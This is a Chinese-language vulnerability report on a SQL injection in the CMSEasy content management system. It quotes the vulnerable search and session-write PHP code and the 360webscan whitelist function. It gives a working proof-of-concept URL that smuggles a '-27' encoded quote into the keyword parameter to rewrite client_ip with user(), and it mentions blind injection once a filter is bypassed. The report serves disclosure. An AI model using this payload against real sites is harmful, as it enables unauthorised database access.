cmseasy最新版 一枚注入

### 简要描述： 可惜没绕过360webscan(其实是轻松绕过的) ### 详细说明： cmseasy最新版0318 存在一个注入 漏洞文件：/lib/default/archive_act.php 250-251行: ``` function search_action() {//print_r($_SESSION);exit(); if (front::get('ule')) { front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']); front::$get['keyword'] = urldecode(front::$get['keyword']); } if (front::get('keyword') && !front::post('keyword')) front::$post['keyword'] = front::get('keyword'); front::check_type(front::post('keyword'), 'safe'); if (front::post('keyword')) { $this->view->keyword = trim(front::post('keyword')); session::set('keyword', trim(front::post('keyword'))); /* if(isset(front::$get['keyword'])) front::redirect(preg_replace('/keyword=[^&]+/','keyword='.urlencode($this->view->keyword),front::$uri)); else front::redirect(front::$uri.'&keyword='.urlencode($this->view->keyword)); */ } else { $this->view->keyword = session::get('keyword'); } if(preg_match('/union/i',$this->view->keyword) || preg_match('/"/i',$this->view->keyword) ||preg_match('/\'/i',$this->view->keyword)){ exit('非法参数'); } ``` 重要代码： ``` if (front::get('ule')) { front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']); front::$get['keyword'] = urldecode(front::$get['keyword']); } ``` get获取的ule存在即可进入这个条件语句 - 变成 % 之后urldecode 导致可以直接引入' 只需传入-27即可 再看 ``` session::set('keyword', trim(front::post('keyword'))); ``` 对应函数代码: ``` class session { static function get($key) { if (isset($_SESSION[$key])) return $_SESSION[$key]; else return false; } static function set($key,$var) { $_SESSION[$key]=$var; } static function del($key) { unset($_SESSION[$key]); } } //session_start(); ``` cmseasy在赋予session值后 会进行一个write操作 /lib/plugins/stsession.php ``` public function write($id,$data) { $sql = "SELECT * FROM {$this->_prefix}sessionox where PHPSESSID = '$id'"; //var_dump($sql); $res = $this->_db->query($sql); $time = time(); $row = $this->_db->fetch_array($res); if ($row) { //if ($row['data'] != $data) { $sql = "UPDATE {$this->_prefix}sessionox SET update_time='$time',data='$data' WHERE PHPSESSID = '$id'"; $this->_db->query($sql); //} } else { if (!empty($data)) { $sql = "INSERT INTO {$this->_prefix}sessionox (PHPSESSID, update_time, client_ip, data) VALUES ('$id','$time','$this->_ip','$data')"; $this->_db->query($sql); } } return true; } ``` $data数据进入update操作 造成注入 而之后参数preg_match是在数据库操作之后 并无影响 ``` if(preg_match('/union/i',$this->view->keyword) || preg_match('/"/i',$this->view->keyword) ||preg_match('/\'/i',$this->view->keyword)){ exit('非法参数'); } ``` 而拦截白名单也做出更改了 想不到办法绕过360webscan ``` /** * 拦截目录白名单 */ function webscan_white($webscan_white_name,$webscan_white_url=array()) { $url_path=$_SERVER['SCRIPT_NAME']; foreach($_GET as $key=>$value){ $url_var.=$key."=".$value."&"; } if (preg_match("/".$webscan_white_name."/is",$url_path)==1&&!empty($webscan_white_name)) { return false; } foreach ($webscan_white_url as $key => $value) { if(!empty($url_var)&&!empty($value)){ if (stristr($url_path,$key)&&stristr($url_var,$value)) { return false; } } elseif (empty($url_var)&&empty($value)) { if (stristr($url_path,$key)) { return false; } } } return true; } ``` ### 漏洞证明： 证明一下存在注入 http://127.0.0.1/cmseasy/index.php?case=archive&act=search&keyword=-27,client_ip=user()-23&ule=1 [<img src="https://images.seebug.org/upload/201504/201508559cba4700c3cd613fd71cf2c945e1f285.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/201508559cba4700c3cd613fd71cf2c945e1f285.jpg) [<img src="https://images.seebug.org/upload/201504/20150909e74c6ad6eafdaf3c57235dbf9a009514.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/20150909e74c6ad6eafdaf3c57235dbf9a009514.png) 绕过了360webscan就可以直接盲注了